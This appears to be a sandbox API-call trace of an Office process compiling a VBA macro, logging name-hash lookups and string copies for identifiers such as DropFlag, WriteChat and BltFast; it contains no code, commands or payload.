LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExY") returned 0x108b50 [0030.269] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerY") returned 0x10f4b8 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.269] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ExX" | out: _Dst="ExX") returned 0x0 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeX") returned 0x10b35c [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExY") returned 0x108b50 [0030.270] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExY") returned 0x108b50 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeY") returned 0x10b359 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerUp") returned 0x10e2b1 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.270] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ExX" | out: _Dst="ExX") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExY") returned 0x108b50 [0030.270] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.270] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ExX" | out: _Dst="ExX") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52386, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52386, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="AnimExpl") returned 8 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ExY" | out: _Dst="ExY") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rExpl" | out: _Dst="rExpl") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rExpl" | out: _Dst="rExpl") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rExpl" | out: _Dst="rExpl") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rExpl" | out: _Dst="rExpl") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sw" | out: _Dst="sw") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sh" | out: _Dst="sh") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.271] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52516, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0030.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52516, cbMultiByte=12, lpWideCharStr=0xb4e31c8, cchWideChar=12 | out: lpWideCharStr="MakeFarplane") returned 12 [0030.271] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="b" | out: _Dst="b") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xw" | out: _Dst="xw") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yw" | out: _Dst="yw") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xw" | out: _Dst="xw") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yw" | out: _Dst="yw") returned 0x0 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeX") returned 0x10b35c [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeY") returned 0x10b359 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xtl") returned 0x10f04e [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xtl" | out: _Dst="xtl") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xw") returned 0x105fe3 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ytl") returned 0x10e043 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ytl" | out: _Dst="ytl") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yw") returned 0x105f74 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xtl") returned 0x10f04e [0030.272] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xtl" | out: _Dst="xtl") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xw") returned 0x105fe3 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xtl") returned 0x10f04e [0030.272] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xtl" | out: _Dst="xtl") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ytl") returned 0x10e043 [0030.272] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ytl" | out: _Dst="ytl") returned 0x0 [0030.272] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.273] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yw") returned 0x105f74 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ytl") returned 0x10e043 [0030.273] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ytl" | out: _Dst="ytl") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="old18") returned 0x109d03 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dee13") returned 0x10f5b1 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.273] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.273] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.273] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MarkusPils") returned 0x102804 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MarkusPils") returned 0x102804 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShugarMilk") returned 0x106370 [0030.273] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ShugarMilk" | out: _Dst="ShugarMilk") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CofeeShop") returned 0x10ac6a [0030.273] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CofeeShop" | out: _Dst="CofeeShop") returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Status") returned 0x102b92 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Err") returned 0x108a6f [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Raise") returned 0x10f418 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbObjectError") returned 0x109d0a [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.273] CExposedStream::Read () returned 0x0 [0030.273] CExposedStream::Read () returned 0x0 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MakeFarplane2") returned 0x104275 [0030.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dee13") returned 0x10f5b1 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.274] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.274] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ytl") returned 0x10e043 [0030.274] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ytl" | out: _Dst="ytl") returned 0x0 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yw") returned 0x105f74 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rD") returned 0x105ef3 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hh") returned 0x105d85 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xtl") returned 0x10f04e [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ytl") returned 0x10e043 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BackBuffer") returned 0x102e9b [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BltFast") returned 0x107839 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Farplane") returned 0x105039 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rDD") returned 0x10cde0 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDBLTFAST_WAIT") returned 0x108122 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DropFlag") returned 0x107d52 [0030.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5111a, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5111a, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="DropFlag") returned 8 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.275] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.275] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.275] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.275] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.275] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lNewOffSet" | out: _Dst="lNewOffSet") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.275] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lNewOffSet" | out: _Dst="lNewOffSet") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.275] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.275] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MSG_DROPFLAG") returned 0x105bde [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddBufferData") returned 0x103ecc [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.275] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VarPtr") returned 0x10a662 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lMsg") returned 0x10a881 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lNewOffSet") returned 0x10aaac [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SendTo") returned 0x105310 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oNewMsg") returned 0x10d96d [0030.275] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteChat") returned 0x10cf2e [0030.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a513ea, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a513ea, cbMultiByte=9, lpWideCharStr=0x766cf98, cchWideChar=9 | out: lpWideCharStr="WriteChat") returned 9 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.276] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q") returned 0x101068 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.276] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rrect") returned 0x10fced [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.276] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RECT") returned 0x101d69 